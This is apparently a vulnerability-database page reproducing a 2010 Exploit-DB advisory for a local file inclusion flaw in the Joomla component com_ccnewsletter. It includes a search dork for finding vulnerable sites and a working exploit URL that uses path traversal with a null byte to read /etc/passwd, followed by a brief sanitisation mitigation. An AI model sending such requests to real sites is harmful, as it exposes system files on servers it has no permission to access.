Joomla Component com_ccnewsletter Local File Inclusion

vendor:

com_ccnewsletter

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

Local File Inclusion [LFI]

CWE

Product Name: com_ccnewsletter

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_ccnewsletter Local File Inclusion

A vulnerability in Joomla Component com_ccnewsletter allows an attacker to include a local file via a specially crafted URL. The attacker can send a request to the vulnerable server with a malicious URL containing a path traversal string (e.g. ../../../../../../../../../../etc/passwd%00) which will allow the attacker to read the contents of the file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

Joomla Component com_ccnewsletter Local File Inclusion
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Home           : www.sec-attack.com/vb

.:. Script         : Joomla Component com_ccnewsletter

.:. Bug Type       : Local File Inclusion [LFI]

.:. Dork           : inurl:"com_ccnewsletter"

.:. Date           : 28/1/2010

#############################################

===[ Exploit ]===

http://server/index.php?option=com_ccnewsletter&controller=[LFI]

http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00


#############################################

Greats T0: My Mind & All member Sec Attack